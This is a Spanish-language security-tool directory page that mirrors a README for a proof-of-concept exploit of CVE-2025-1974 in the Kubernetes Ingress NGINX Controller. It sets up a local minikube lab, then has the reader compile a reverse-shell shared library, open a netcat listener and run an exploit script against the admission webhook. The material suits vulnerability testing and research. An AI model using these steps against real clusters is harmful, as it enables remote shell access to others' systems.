Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-1974 — CVE-2025-1974 PoC código | Kitploit
Herramientas/GitHubGitHub/zulloper/cve-2025-1974
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónSeguridad en la Nube
GitHubzulloper/cve-2025-1974

CVE-2025-1974

CVE-2025-1974 PoC código

Ver Repositorio
5hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-1974: Análisis de vulnerabilidad y configuración del entorno PoC para Kubernetes Ingress Nginx Controller

Entorno de prueba

  • MacOS (M2)
  • Ingress NGINX Controller 1.11.3
  • Rancher Desktop (Docker)
  • Minikube (Kubernetes)

Configuración del entorno de prueba local (M2 MacOS)

Instalar minikube para las pruebas locales

minikube start --driver=docker

Configurar el ingress-nginx-controller con el siguiente comando

kubectl apply -f ingress-nginx-controller.yml

Port forwarding

Verificar que los Pods estén funcionando correctamente

kubectl get pods -n ingress-nginx

kubectl describe <pod name> -n ingress-nginx

Reenviar los puertos 80 y 8443 (webhook) de los Pods a los puertos locales 8888 y 1337 (Se necesita el reenvío de puertos tanto para 80 como para 8443)

kubectl port-forward -n ingress-nginx <pod name> 8888:80

kubectl port-forward -n ingress-nginx <pod name> 1337:8443

Preparación de la biblioteca de objetos compartidos (so)

Cambiar la IP y el Puerto de la conexión reverse shell en rev_shell.c

Compilar en entorno MacOS (arm64), se necesita compilar según el entorno de prueba

aarch64-linux-gnu-gcc -shared -fPIC -o rev_shell.so rev_shell.c

root@kitploit:~
# Instalar compilador cruzado
brew tap messense/macos-cross-toolchains
brew install aarch64-linux-gnu

Creación de AdmissionReview (opcional, se pueden usar archivos creados previamente)

Convertir a formato AdmissionReview con kube-review (json)

./kube-review-darwin-arm64 create admission_test.yml > admission_review_req_body.json

Exploit

Preparar la conexión reverse shell con nc

nc -lv 4444

Modificar el host y puerto de nginx y webhook en exploit.py y ejecutar

python3 exploit.py

img.png

Descargar herramienta